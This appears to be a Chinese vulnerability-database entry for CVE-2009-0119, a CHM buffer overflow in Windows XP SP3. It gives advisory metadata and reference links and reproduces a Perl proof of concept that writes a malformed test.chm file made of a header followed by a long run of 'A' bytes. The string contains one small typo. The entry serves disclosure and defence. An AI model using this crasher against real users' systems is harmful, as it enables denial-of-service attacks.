Microsoft Windows CHM文件处理缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117222 漏洞类型 缓冲区溢出
发布时间 2009-01-11 更新时间 2009-01-29
CVE编号 CVE-2009-0119 CNNVD-ID CNNVD-200901-128
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/7720
https://cxsecurity.com/issue/WLB-2009010164
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-128
|漏洞详情
Windows是微软发布的非常流行的操作系统。MicrosoftWindowsXPSP3存在缓冲区溢出漏洞。如果用户在Windows系统中受骗打开了畸形的CHM文件,就可能触发缓冲区溢出,导致关联到CHM的应用崩溃。
|漏洞EXP
################################################################################################################################
#MS Windows .CHM Denial of Service (html compiled)
#
##########################################################################################################################################
#!/usr/bin/perl

use strict;

my $chm =
"\x49\x54\x53\x46\x03\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00\x2d\x83\xe7\x69\x09".
"\x18\x00\x00\x10\xfd\x01\x7c\xaa\x7b\xd0\x11\x9e\x0c\x00\xa0\xc9\x22\xe6\xec\x11".
"\xfd\x01\x7c\xaa\x7b\xd0\x11\x9e\x0c\x00\xa0\xc9\x22\xe6\xec\x60\x00\x00\x00\x00".
"\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x54".
"\x10\x00\x00\x00\x00\x00\x00\xcc\x10\x00\x00\x00\x00\x00\x00\xfe\x01\x00\x00\x00".
"\x00\x00\x00\xb8\x46\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49".
"\x54\x53\x50\x01\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
open(out, "> test.chm");
binmode(out);
print (out $chm);
close(out);

# milw0rm.com [2009-01-11]
|参考资料

来源:BID
名称:33204
链接:http://www.securityfocus.com/bid/33204
来源:MILW0RM
名称:7720
链接:http://www.milw0rm.com/exploits/7720
来源:SREASON
名称:4912
链接:http://securityreason.com/securityalert/4912